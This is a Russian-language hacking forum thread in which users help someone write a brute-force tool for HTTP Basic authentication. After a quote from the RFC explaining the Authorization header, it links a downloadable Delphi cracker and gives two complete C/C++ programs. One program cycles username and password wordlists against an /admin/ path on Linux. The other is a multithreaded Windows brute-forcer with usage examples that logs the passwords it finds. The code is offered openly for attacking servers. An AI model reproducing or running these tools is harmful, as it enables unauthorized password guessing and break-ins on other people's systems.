помогите написать брут для basic-auth на си си++ или дельфях

Я сомневаюсь что ктото здесь будет писать за тебя. Начинай и если будут вопросы задавай и юзеры постораються ответить.

зачем изобретать велосипед?
brutus aet2

зачем изобретать велосипед?
brutus aet2
про велосипед вобще никто не спрашивал,не одобряю.

зачем изобретать велосипед?
brutus aet2
если бы мне нужен был брутус я бы не спрашивал..мне нужен свой консольный брут...искал в инете инфу чтот ничего путного не нашёл

юзай сокеты... Прими ответ от басика и там уже думай

Upon receipt of an unauthorized request for a URI within the protection space, the server should respond with a challenge like the following:
WWW-Authenticate: Basic realm="WallyWorld"
where "WallyWorld" is the string assigned by the server to identify the protection space of the Request-URI.

To receive authorization, the client sends the user-ID and password, separated by a single colon (":") character, within a base64 [5] encoded string in the credentials.
basic-credentials = "Basic" SP basic-cookie
basic-cookie = <base64 [5] encoding of userid-password,
except not limited to 76 char/line>
userid-password = [ token ] ":" *TEXT

If the user agent wishes to send the user-ID "Aladdin" and password "open sesame", it would use the following header field:
Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==


тоесть :

"GET /private/index.html HTTP/1.0
Host: localhost
Authorization: Basic " + Convert.ToBase64String(new ASCIIEncoding().GetBytes(username + ":" + Password))

а именно: строку в хидер:
Authorization: Basic ... + строку вида : Логин и Пароль через двоеточие - в Base64 ...

_http://badnewsforyou.narod.ru/webhacker.rar
Залил исходник(Делфе :cool: ) программы наподобие брутус ает

за $30 напишу

пример под линух by И.Скляров..
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

#define USER "users.txt"
#define PASS "words.txt"
#define CATALOG "/admin/"

static char table64[]=
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/";

char *port_host;
char *name;

void token(char *arg)
{
name = strtok(arg, ":");
port_host = strtok(NULL, "");

if (port_host == NULL)
port_host = "80";
}

void base64Encode(char *intext, char *output)
{
unsigned char ibuf[3];
unsigned char obuf[4];
int i;
int inputparts;

while(*intext) {
for (i = inputparts = 0; i < 3; i++) {
if(*intext) {
inputparts++;
ibuf[i] = *intext;
intext++;
}
else
ibuf[i] = 0;
}

obuf [0] = (ibuf [0] & 0xFC) >> 2;
obuf [1] = ((ibuf [0] & 0x03) << 4) | ((ibuf [1] & 0xF0) >> 4);
obuf [2] = ((ibuf [1] & 0x0F) << 2) | ((ibuf [2] & 0xC0) >> 6);
obuf [3] = ibuf [2] & 0x3F;

switch(inputparts) {
case 1: /* only one byte read */
sprintf(output, "%c%c==",
table64[obuf[0]],
table64[obuf[1]]);
break;
case 2: /* two bytes read */
sprintf(output, "%c%c%c=",
table64[obuf[0]],
table64[obuf[1]],
table64[obuf[2]]);
break;
default:
sprintf(output, "%c%c%c%c",
table64[obuf[0]],
table64[obuf[1]],
table64[obuf[2]],
table64[obuf[3]] );
break;
}
output += 4;
}
*output=0;
}

int main(int argc, char **argv)
{
FILE *fd1, *fd2;
int sd, bytes;
char buf1[250], buf2[250];
char buf[250];
char str1[270], str2[100];
struct hostent* host;
struct sockaddr_in servaddr;
char rez[2000];
char c[600];

if (argc < 2 || argc > 3) {
fprintf(stderr, "Usage: %s host[:port] [proxy][:port]\n\n", argv[0]);
exit(-1);
}

if (argc == 3)
token(argv[2]);
else
token(argv[1]);

if ( (host = gethostbyname(name)) == NULL) {
herror("gethostbyname() failed");
exit(-1);
}

bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(atoi(port_host));
servaddr.sin_addr = *((struct in_addr *)host->h_addr);

if ( (fd1 = fopen(USER, "r")) == NULL) {
perror("fopen() failed");
exit(-1);
}

while(fgets(buf1, 250, fd1) != NULL)
{
buf1[strcspn(buf1, "\r\n\t")] = 0;
if (strlen(buf1) == 0) continue;

if( (fd2 = fopen(PASS, "r")) == NULL) {
perror("fopen() failed");
exit(-1);
}

while(fgets(buf2, 250, fd2) != NULL)
{
buf2[strcspn(buf2, "\r\n\t")] = 0;
if (strlen(buf2) == 0) continue;

sprintf(c, "%s:%s", buf1, buf2);
base64Encode(c, rez);

if ( (sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket() failed");
exit(-1);
}

if (connect(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1) {
perror("connect() failed");
exit(-1);
}

if (argc == 2)
sprintf(str1, "GET %s HTTP/1.1\r\n", CATALOG);
else
sprintf(str1, "GET http://%s%s HTTP/1.1\r\n", argv[1], CATALOG);

sprintf(str2, "Host:%s\r\nAuthorization: Basic %s\r\n\r\n", argv[1], rez);

send(sd, str1, strlen(str1), 0);
send(sd, str2, strlen(str2), 0);

bzero(buf, 250);

bytes = recv(sd, buf, sizeof(buf)-1, 0);
buf[bytes] = 0;

if (strstr(buf, "200 OK") != NULL) {
printf("======================================\n");
printf("%s", str1);

printf("%s\n", str2);
printf("Result OK: %s\n", c);
printf("======================================\n");
}

close(sd);
}
}

return 0;
}

Тоже написал

#include <winsock2.h>
#include <stdio.h>
#include <conio.h>

#pragma comment(lib,"ws2_32")

#define PACK "GET %s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\n\r\n"
#define KR 128

////////////////////////////////////////////////////////////////////////
FILE *fr;
char pack[128];
int CurThr;
sockaddr_in ClientService;
int CLsize;
char host[128];
char path[128];
int THR;
int PL;
int so;
int p_good, p_bad, p_er;
int fl;
char fwr[128];
struct pp{
char p[128];
int st;
int tr;
};
pp *pass;


static const unsigned char base64digits[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/";

#define BAD 255
static const unsigned char base64val[] = {
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD, 62, BAD,BAD,BAD, 63,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61,BAD,BAD, BAD,BAD,BAD,BAD,
BAD, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25,BAD, BAD,BAD,BAD,BAD,
BAD, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51,BAD, BAD,BAD,BAD,BAD
};
#define DECODE64(c) ((c > 32 && c<127)? base64val[(int)c] : BAD)

char* en64 (const char *in, char *out, int inlen)
{
for (; inlen > 0; inlen -= 3, in+=3)
{

*out++ = base64digits[in[0] >> 2];
*out++ = base64digits[((in[0]&3)<<4) | ((inlen > 1)?(in[1]>>4):0)];
*out++ = (inlen > 1)? base64digits[((in[1] << 2) & 0x3c) | ((inlen > 2)? (in[2] >> 6) : 0)]: '=';
*out++ = (inlen > 2)? base64digits[in[2] & 0x3f] : '=';
}
*out = '\0';
return out;
}


DWORD WINAPI check(LPVOID i)
{
char header[256];
char b64t[200];
en64(pass[(int)i].p, b64t, strlen(pass[(int)i].p));
sprintf(header, pack, b64t);
SOCKET ksocket;
int len;
char buff[32];
FILE *fw;

ksocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(connect( ksocket, (SOCKADDR*) &ClientService, CLsize ) == SOCKET_ERROR)
{
pass[(int)i].tr = 0;
CurThr--;
p_er++;
return false;
}
len = send(ksocket, header, strlen(header), 0);
if(len == SOCKET_ERROR)
{
pass[(int)i].tr = 0;
CurThr--;
p_er++;
return false;
}
buff[recv(ksocket, buff, 32, 0)] = '\0';

if(strstr(buff, "200 OK") != NULL)
{
if(fl) Sleep(50);
fl=1;
fw=fopen(fwr, "ab");
fprintf(fw,"%s\n", pass[(int)i].p);
fclose(fw);
fl=0;
p_good++;
}
else p_bad++;
closesocket(ksocket);

pass[(int)i].st=0;
pass[(int)i].tr = 0;
CurThr--;
PL--;
return true;
}


DWORD WINAPI READ(LPVOID x)
{
int i;

for(i=0; i<KR; i++)
{
pass[i].st=0;
pass[i].tr=0;
}
i=0;
while(!feof(fr))
{
if(i >= KR) i=0;

if(pass[i].st == 0 && pass[i].tr == 0)
{
fgets(pass[i].p, 128, fr);
pass[i].p[strcspn(pass[i].p, "\r\n\t")] = 0;
pass[i].st=1;
PL++;
}
i++;
}
PL--;
fclose(fr);

return true;
}


DWORD WINAPI info(LPVOID x)
{
while(so)
{
system("cls");
printf("Target: %s%s\n", host, path);;
printf("Thread: %d/%d\n", CurThr, THR);
printf("Founr: %d\n", p_good);
printf("Bad: %d\n", p_bad);
printf("Error: %d\n", p_er);
Sleep(500);
}
return true;
}


int main(int argc, char *argv[])
{

if(argc < 6)
{
printf("USE: host path tread filePass fileResult\n");
return 0;
}

strcpy(host, argv[1]);
strcpy(path, argv[2]);
THR=atoi(argv[3]);
strcpy(fwr, argv[5]);

fr=fopen(argv[4], "rb");
if(!fr)
{
printf("File not found\n");
return 0;
}

WSADATA wsaData;
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
printf("Error at WSAStartup()\n");
return 0;
}

struct hostent *Ip = gethostbyname(host);
if(Ip == NULL)
{
printf("Error at gethostbyname()\n");
return 0;
}
ClientService.sin_family = AF_INET;
ClientService.sin_addr.s_addr = inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
ClientService.sin_port = htons(80);
CLsize=sizeof(ClientService);

DWORD thID;
pass = new pp[KR];
CurThr=0;
p_good=0;
p_bad=0;
p_er=0;
int i=0;
PL=1;
so=1;
fl=0;
sprintf(pack, PACK, path, host, "%s");
CreateThread(0, 0, READ, (LPVOID)0, 0, &thID);

CreateThread(0, 0, info, (LPVOID)0, 0, &thID);
Sleep(1000);
while(PL != 0 || CurThr != 0)
{
if(CurThr >= THR)
{
Sleep(100);
continue;
}
if(i >= KR) i=0;
if(pass[i].st == 1 && pass[i].tr == 0)
{
pass[i].tr = 1;
CurThr++;
CreateThread(0, 0, check, (LPVOID)i, 0, &thID);
}
i++;
}

fclose(fr);
Sleep(1000);
so=0;
system("pause");
return 1;
}

USE: host path tread filePass fileResult
например
brut.exe localhost /1.php 50 pass.txt result.txt

файл с паролямив форммате

логин:пароль
логин:пароль
логин:пароль